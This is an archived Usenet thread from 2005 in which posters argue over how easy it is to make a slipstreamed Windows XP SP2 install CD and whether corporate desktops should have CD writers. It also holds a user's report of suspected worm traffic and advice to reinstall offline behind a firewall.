>>For anyone who owns a cd burner and the original media, creating a new
>>slipstreamed sp2 install cd is trivial.
>
>
> Not as trivial as it should be. If an SP breaks the installation CD,
> as SP2 does, it should include a skippable step in the installation
> process to create that slipstreamed replacement CDR.
>
> If it's so trivial, perhaps you can explain exctly how to make a
> slipstreamed OS CDR in your reply? Or is it non-trivial enough that
> you'd rather point to a URL rather than type it out?
>


Google is your friend

<http://www.google.com/search?client=firefox-a&rls=org.m...;

of course with any info from the internet you'll need to choose a source
you trust and that you can understand.


John
Anonymous
a b 8 Security
January 2, 2005 2:35:41 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Greg Hennessy wrote:
> On Sat, 01 Jan 2005 20:39:06 +0200, "cquirke (MVP Win9x)"
> <cquirkenews@nospam.mvps.org> wrote:
>
>
>>On Fri, 31 Dec 2004 10:46:08 +0000, Greg Hennessy <me@privacy.net>
>>
>>>On Thu, 30 Dec 2004 23:17:53 -0000, "Jason Edwards" <none@invalid.invalid>
>>
>>>>But what they don't offer, as far as I'm aware, is a replacement XP install
>>>>CD for those people who want to reinstall XP.
>>
>>>For anyone who owns a cd burner and the original media, creating a new
>>>slipstreamed sp2 install cd is trivial.
>>
>>Not as trivial as it should be. If an SP breaks the installation CD,
>>as SP2 does,
>
>
> 'breaks the installation CD' in what manner ?

ISO 9660 specifies a maximum path depth of 8, slipstreamed SP2 is 9
directories deep.

> Bearing in mind that that I have a hand crafted slipstreamed SP2 CD in my
> hand that works perfectly.

Made with burning software that ignores the standard, either by default
or at the user's request.

>>If it's so trivial, perhaps you can explain exctly how to make a
>>slipstreamed OS CDR in your reply? Or is it non-trivial enough that
>>you'd rather point to a URL rather than type it out?

http://www.theeldergeek.com/slipstreamed_xpsp2_cd.htm

> Oh do dry up you posturing trout.
>
>
> greg
>
Anonymous
a b 8 Security
January 2, 2005 10:08:08 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Sun, 02 Jan 2005 11:35:41 -0500, Triffid <triffid@nebula.net> wrote:


>>>Not as trivial as it should be. If an SP breaks the installation CD,
>>>as SP2 does,
>>
>>
>> 'breaks the installation CD' in what manner ?
>
>ISO 9660 specifies a maximum path depth of 8, slipstreamed SP2 is 9
>directories deep.

That would be

I386\ASMS\52\policy\msft\windows\networking\dxmrtp

So ? it works, it installs.
Therefore it doesnt *break* the installation CD.

>> Bearing in mind that that I have a hand crafted slipstreamed SP2 CD in my
>> hand that works perfectly.
>
>Made with burning software that ignores the standard,

Again big deal, Nero did what it was supposed to do.

I dont hear anyone bitching about overburning and standards compliance with
iso9660/orange book.

>either by default
>or at the user's request.

It works, it can be read, booted and installed successfully.

And for the truly clueless the likes of autostreamer turns an easy task
into a no brainer.


greg


--
Yeah - straight from the top of my dome
As I rock, rock, rock, rock, rock the microphone
January 3, 2005 12:30:46 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Reinstall again.... WITHOUT your network cable plugged in.
I have seen more than once, XP machines getting whacked by malicious
code before the install was complete. Download SP2 before you install
and burn it to a cd.. Install it BEFORE you go online, along with your
AV software. Alternatively, pick up a consumer grade hardware
firewall... even an el-cheapo netgear/linksys router with packet
filtering will do the trick and give you some protection during the
install & patching process.

G'luck

-- Hey.. I almost got thru an entire reply without saying "install
Linux" <grin>

On Thu, 30 Dec 2004 16:56:32 +0100, "I.L.B." <suricata_2@hotmail.com>
wrote:

>Thanks guys, but I just ran the scanners you told me with no results....
>
>This is really strange: It keeps happening!. It happened just after
>re-install Windows XP, when trying to update it to SP1 and SP2.... that's
>when the outbound bursts began. I can turn off the network connection, I
>restart it again... then after a few seconds, the bursts of outgoing packets
>start... when running NETSTAT, I see first, an ESTABLISHED connection to
>"unknown.sagonet.net:6667" (to an IRC port!!!), then it comes the stream of
>outbound packets, from 3000 to 4000 ports and so on... with no end!!. In the
>meanwhile I have no access to web surf nor anything regular, just bursts of
>TCP packets flying away from my computer.
>
>And it happened just when I re-installed XP, so ain't got time to download
>any virus or worm or anything.
>
>If that sounds familiar to any of you, please help me. Thanks...
>
>
>
>"I.L.B." <suricata_2@hotmail.com> wrote in message
>news:cr0i45$nu2$1@nsnmpen2-gest.nuria.telefonica-data.net...
>> Hi all ;
>>
>> I am just experiencing a strange kind of infection I don't know wether is
>a
>> new worm or not, as I never seen it before. The situation is next:
>>
>> - I am running a computer with both Win98 and XP installed.
>> - My Win98 session works OK
>> - When I start an XP session, and I do activate my network connection... I
>> start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
>> activity light is flickering like crazy... what happens??
>> - I check the Status of the connection, and I see dozens of outbound
>packets
>> per second, and almost nothing incoming. Strange...
>> - I run NETSTAT to see what it happens. I see a LOT of outbound TCP
>> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
>> on... no way to stop it !. All of these netstat entries end at some
>strange
>> IPs at EPMAP port.
>> - I run TaskManager, and I see a lot of started process of "SVCHOST" and
>> "IEEXPLORE" (about 5 or 6 instances of each one started).
>>
>> I just checked for Sasser, Welchia worms, but the tools said I don't have
>> these worms on my computer...
>>
>> Any ideas? Thanks !!
>>
>>
>>
>
Anonymous
a b 8 Security
January 4, 2005 3:47:31 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Sat, 01 Jan 2005 19:07:37 +0000, Greg Hennessy <me@privacy.net>
>On Sat, 01 Jan 2005 20:39:06 +0200, "cquirke (MVP Win9x)"

>>>For anyone who owns a cd burner and the original media, creating a new
>>>slipstreamed sp2 install cd is trivial.

>>Not as trivial as it should be. If an SP breaks the installation CD,
>>as SP2 does,

>'breaks the installation CD' in what manner ?

>Bearing in mind that that I have a hand crafted slipstreamed SP2 CD in my
>hand that works perfectly.

Bearing in mind that other users do NOT have a working slipstreamed
installation disk pop out of thier hand automatically. What thy do
have - and ALL they have - is the pre-SP2 installation CD that will
not do a repair install and may not run RC either.

My challenge - which you ducked - stands: If it's so "trivial" to make
your own slipstreamed installation CDR, then please do tell us how.



>---------- ----- ---- --- -- - - - -
"He's such a character!"
' Yeah - CHAR(0) '
>---------- ----- ---- --- -- - - - -
Anonymous
a b 8 Security
January 4, 2005 1:31:18 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Tue, 04 Jan 2005 00:47:31 +0200, "cquirke (MVP Win9x)"
<cquirkenews@nospam.mvps.org> wrote:


>>Bearing in mind that that I have a hand crafted slipstreamed SP2 CD in my
>>hand that works perfectly.
>
>Bearing in mind that other users do NOT have a working slipstreamed
>installation disk pop out of thier hand automatically.

Aww bless, a descent into fallacy,
Note what I originally said

"For anyone who owns a CD burner and the original media, creating a new
slipstreamed sp2 install CD is trivial. "

We are not discussing 'other users'. We are clearly talking about users
with a CD burner and the original media.

The act of owning a CD burner usually implies a certain level of 'clue'
w.r.t the creation of CDs from scratch.

Said level of clue would also imply that they have the wherewithal to
utilise www.google.com with the expression

winxp sp2 slipstream

Yielding a search URL of

http://www.google.co.uk/search?hl=en&q=winxp+sp2+slipst...

where at least the 1st dozen or so links returned go into explicit detail
of how to build a hand rolled SP2 installation CD using the original media
and a CD burner. (which was the topic being discussed)

Just for the record I shall give a Hat Tip to Paul Thorrott of
www.winsupersite.com for a clearly documented and easy to follow method
which I've utilised previously.


Now I know that may be a little too advanced for an (MVP Win9x).

> What thy do
>have - and ALL they have - is the pre-SP2 installation CD that will
>not do a repair install and may not run RC either.

Again you wilfully ignore what I wrote previously.

"For anyone who owns a CD burner and the original media, creating a new
slipstreamed sp2 install CD is trivial. "

Note the part of the sentence before the comma.


>My challenge - which you ducked - stands: If it's so "trivial" to make
>your own slipstreamed installation CDR, then please do tell us how.
>

I suggest you read what I wrote in

Message-ID: <q5fgt0lf0ih7ve65fd7ik5d0h5mmb60jnc@4ax.com>

In particular pay close attention to the last sentence.


Please continue with this asinine attempt at a pissing contest, its most
amusing watching someone with a bladder the size of a walnut in action.



greg

--
Yeah - straight from the top of my dome
As I rock, rock, rock, rock, rock the microphone
Anonymous
a b 8 Security
January 4, 2005 7:23:19 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Tue, 04 Jan 2005 10:31:18 +0000, Greg Hennessy <me@privacy.net>
>On Tue, 04 Jan 2005 00:47:31 +0200, "cquirke (MVP Win9x)"

>>>Bearing in mind that that I have a hand crafted slipstreamed SP2 CD in my
>>>hand that works perfectly.

>>Bearing in mind that other users do NOT have a working slipstreamed
>>installation disk pop out of thier hand automatically.

>"For anyone who owns a CD burner and the original media, creating a new
>slipstreamed sp2 install CD is trivial. "

>We are not discussing 'other users'. We are clearly talking about users
>with a CD burner and the original media.

OK so far.

>The act of owning a CD burner usually implies a certain level of 'clue'

False. Most new PCs ship with CD writers, and most users end up using
XP's awful built-in CD writing "support".

In 1995 or so, when CD writers were slow, costly, and prone to kicking
coasters, you'd be right. But they are standard equipment today.

>http://www.google.co.uk/search?hl=en&q=winxp+sp2+slipst...

>where at least the 1st dozen or so links returned go into explicit detail
>of how to build a hand rolled SP2 installation CD using the original media
>and a CD burner. (which was the topic being discussed)

>Just for the record I shall give a Hat Tip to Paul Thorrott of
>www.winsupersite.com for a clearly documented and easy to follow method
>which I've utilised previously.

>Again you wilfully ignore what I wrote previously.

No, I'm focusing on your asinine claim that it is "trivial" to
generate a slipstreamed OS CD. I see it's not so trivial that you can
explain exactly how to do it here, without pointing to web pages ar
mumbling about Google. The reason being that what you have to know to
do this, is not trivial enough to write up in one paragraph.

>"For anyone who owns a CD burner and the original media, creating a new
>slipstreamed sp2 install CD is trivial. "

>Note the part of the sentence before the comma.

I do. You're still wrong :-)



>--------------- ----- ---- --- -- - - -
Who is General Failure and
why is he reading my disk?
>--------------- ----- ---- --- -- - - -
Anonymous
a b 8 Security
January 4, 2005 7:23:20 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Tue, 04 Jan 2005 16:23:19 +0200, "cquirke (MVP Win9x)"
<cquirkenews@nospam.mvps.org> wrote:

>
>>The act of owning a CD burner usually implies a certain level of 'clue'
>
>False. Most new PCs ship with CD writers,

Another false premise.

Most new PCs do *not* ship with CD writers.

There is no corporate I know of who would accept desktop PCs from Dell,
HPAQ or anyone else with CDRW as standard.

[equivocating nonsense binned unread]
--
Yeah - straight from the top of my dome
As I rock, rock, rock, rock, rock the microphone
January 5, 2005 2:00:48 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Greg Hennessy" wrote:
> On Tue, 04 Jan 2005 16:23:19 +0200, "cquirke (MVP Win9x)"
> <cquirkenews@nospam.mvps.org> wrote:
>
>>>The act of owning a CD burner usually implies a certain level of 'clue'
>>
>>False. Most new PCs ship with CD writers,
>
> Another false premise.
>
> Most new PCs do *not* ship with CD writers.
>
> There is no corporate I know of who would accept desktop PCs from Dell,
> HPAQ or anyone else with CDRW as standard.

That's funny. I work for a corporate which has recently renewed all
its PCs (several thousand seats). All come with CD writers.
Anonymous
a b 8 Security
January 5, 2005 2:13:04 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Ant" <not@home.today> wrote:

> "Greg Hennessy" wrote:
> > On Tue, 04 Jan 2005 16:23:19 +0200, "cquirke (MVP Win9x)"
> > <cquirkenews@nospam.mvps.org> wrote:
> >
> >>>The act of owning a CD burner usually implies a certain level of 'clue'
> >>
> >>False. Most new PCs ship with CD writers,
> >
> > Another false premise.
> >
> > Most new PCs do *not* ship with CD writers.
> >
> > There is no corporate I know of who would accept desktop PCs from Dell,
> > HPAQ or anyone else with CDRW as standard.
>
> That's funny. I work for a corporate which has recently renewed all
> its PCs (several thousand seats). All come with CD writers.

I suppose you don't work for a bank! ;-)
Anonymous
a b 8 Security
January 5, 2005 2:13:05 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Wed, 05 Jan 2005 11:13:04 +0200, Zvi Netiv
<support@replace_with_domain.com> wrote:


>> That's funny. I work for a corporate which has recently renewed all
>> its PCs (several thousand seats). All come with CD writers.
>
>I suppose you don't work for a bank! ;-)

Or any company with a with properly run procurement dept.
--
Yeah - straight from the top of my dome
As I rock, rock, rock, rock, rock the microphone
January 5, 2005 4:02:06 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Greg Hennessy" wrote:

> On Wed, 05 Jan 2005 11:13:04 +0200, Zvi Netiv
> <support@replace_with_domain.com> wrote:
>
>>> That's funny. I work for a corporate which has recently renewed all
>>> its PCs (several thousand seats). All come with CD writers.
>>
>>I suppose you don't work for a bank! ;-)

Scientific R&D.

> Or any company with a with properly run procurement dept.

What do you mean by that? Most of us require CDRW; it's the modern
equivalent of a floppy disk.
Anonymous
a b 8 Security
January 5, 2005 4:47:14 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Wed, 5 Jan 2005 13:02:06 -0000, "Ant" <not@home.today> wrote:


>> Or any company with a with properly run procurement dept.
>
>What do you mean by that?

A CDRW is 3+ times the price of a plain CD/DVD player if not more.

Now multiply that by a new desktop rollout across a large organisation....

>Most of us require CDRW; it's the modern
>equivalent of a floppy disk.

'Most of us' (i.e average desktop PC users in a corporate environment) have
zero requirement for a floppy disk, cdrw or USB flash memory.

'Most of us' have absolutely no business transferring files in that manner
when properly screened and managed alternatives are there to be used.


They are all security hazards and eminently preventable, be it through
removal or application of policy.



greg



--
Yeah - straight from the top of my dome
As I rock, rock, rock, rock, rock the microphone
January 5, 2005 6:45:36 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Greg Hennessy" wrote:

> On Wed, 5 Jan 2005 13:02:06 -0000, "Ant" <not@home.today> wrote:
>
>>> Or any company with a with properly run procurement dept.
>>
>>What do you mean by that?
>
> A CDRW is 3+ times the price of a plain CD/DVD player if not more.
>
> Now multiply that by a new desktop rollout across a large organisation....

We got a good deal because of the large number of units.

>>Most of us require CDRW; it's the modern
>>equivalent of a floppy disk.
>
> 'Most of us' (i.e average desktop PC users in a corporate environment) have
> zero requirement for a floppy disk, cdrw or USB flash memory.

Most of *us* are not average users. Most are scientists, engineers,
and computing experts. Most of us need to be able to produce
documents, presentations, software, etc. for demonstration, or
distribution to customers and others in our field(s). I did say we
are a scientific research & development company. We don't have a
single product, but have many specialists producing diverse
solutions to various problems for a variety of customers.

> 'Most of us' have absolutely no business transferring files in that manner
> when properly screened and managed alternatives are there to be used.

Most of us do, most of us have clue, and all of us are trusted to
follow the security procedures, about which we are reminded
frequently. There are penalties for not doing so.

> They are all security hazards and eminently preventable, be it through
> removal or application of policy.

Of course there's a risk, but this is one we have to manage.
Anonymous
a b 8 Security
January 12, 2005 4:23:16 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Tue, 04 Jan 2005 15:48:23 +0000, Greg Hennessy <me@privacy.net>
>On Tue, 04 Jan 2005 16:23:19 +0200, "cquirke (MVP Win9x)"
><cquirkenews@nospam.mvps.org> wrote:

>>>The act of owning a CD burner usually implies a certain level of 'clue'

>>False. Most new PCs ship with CD writers,

>Most new PCs do *not* ship with CD writers.

>There is no corporate I know of who would accept desktop PCs from Dell,
>HPAQ or anyone else with CDRW as standard.

What has that to do with anything?

There is no corporate I know of with enough IT suss to avoid
workstation CDRW (and presumably USB sticks, hmm?) that would have
trouble making a slipstream OS CD, assuming they don't rebuild
workstations from thier own disk images anyway.

If you are saying that because the lame bland crowd can't sell
CDRW-standard configs to corporates, that they also don't offer these
to consumerland, well... that's just another reason to avoid bland
lame systems. When the cost difference between CD-ROM and CDRW is as
little as it is today, you'd have to really hate users to withhold
that functionality from them. Which means Joe Sixpack is quite likely
to have a CDRW drive out of the box, and good for him too!

Look; if you are utterly clue-resistant, just don't bother to reply,
OK? It's already obvious you made an untenable assertion, and you're
just digging yourself in deeper. Bye.



>---------------- ----- ---- --- -- - - - -
Cats have 9 lives, which makes them
ideal for experimentation!
>---------------- ----- ---- --- -- - - - -
Anonymous
a b 8 Security
January 12, 2005 5:12:35 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Wed, 12 Jan 2005 13:23:16 +0200, "cquirke (MVP Win9x)"
<cquirkenews@nospam.mvps.org> wrote:


>Look; if you are utterly clue-resistant, just don't bother to reply,
>OK? It's already obvious you made an untenable assertion, and you're
>just digging yourself in deeper. Bye.

Most amusing from the intellect replying over a week later in some vain
attempt to have the last word.

If you cannot figure out how to use group policy to deny the use of items
such as usb mass storage, that is not the fault of the audience.

As has been pointed out elsewhere, there is no corporate with anything
resembling a sane IT procurement and IT security policy would countenance
CDRW on the desktop.




greg

--
Yeah - straight from the top of my dome
As I rock, rock, rock, rock, rock the microphone
Anonymous
a b 8 Security
January 12, 2005 5:12:36 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Greg Hennessy" <me@privacy.net> wrote in message
news:i36au01mff8kprvg3t8tg1b0mrgsnf0d4o@4ax.com...

> As has been pointed out elsewhere, there is no corporate with anything
> resembling a sane IT procurement and IT security policy would countenance
> CDRW on the desktop.
>
Greg, if you're so sure you're dealing with facts and not an opinion, why
not give some examples of these companies that adminster an IT policy that
prohibits CDRWs?
That would at least be a good first step in support of your assertion.
Anonymous
a b 8 Security
January 12, 2005 5:59:03 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

In article <isSdnTEkM_UVpnjcRVn-2w@comcast.com>, optikl@newsgroups.net
says...
>
> "Greg Hennessy" <me@privacy.net> wrote in message
> news:i36au01mff8kprvg3t8tg1b0mrgsnf0d4o@4ax.com...
>
> > As has been pointed out elsewhere, there is no corporate with anything
> > resembling a sane IT procurement and IT security policy would countenance
> > CDRW on the desktop.
> >
> Greg, if you're so sure you're dealing with facts and not an opinion, why
> not give some examples of these companies that adminster an IT policy that
> prohibits CDRWs?
> That would at least be a good first step in support of your assertion.

The health-care groups I work with don't permit removable media at any
general desktop computer in their offices. The servers have RW drives,
and so do some of the managers, but the hundreds of workstations don't,
and the policy forbids USB/Card devices (including PDA's) except for
those with written permission to use them.

--
--
spamfree999@rrohio.com
(Remove 999 to reply to me)
Anonymous
a b 8 Security
January 12, 2005 5:59:04 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Leythos" <void@nowhere.lan> wrote in message
news:MPG.1c4f07601b3a0434989ecf@news-server.columbus.rr.com...
>
> The health-care groups I work with don't permit removable media at any
> general desktop computer in their offices. The servers have RW drives,
> and so do some of the managers, but the hundreds of workstations don't,
> and the policy forbids USB/Card devices (including PDA's) except for
> those with written permission to use them.
>

I figured there must some exceptions. I would find it extremely difficult to
imagine my being able to transfer technical design data I have sold to
customers outside my company without having CDRW privileges as an option.
Email encryption is cumbersome for very large files and usually violates our
IT policy for the attachment size.
!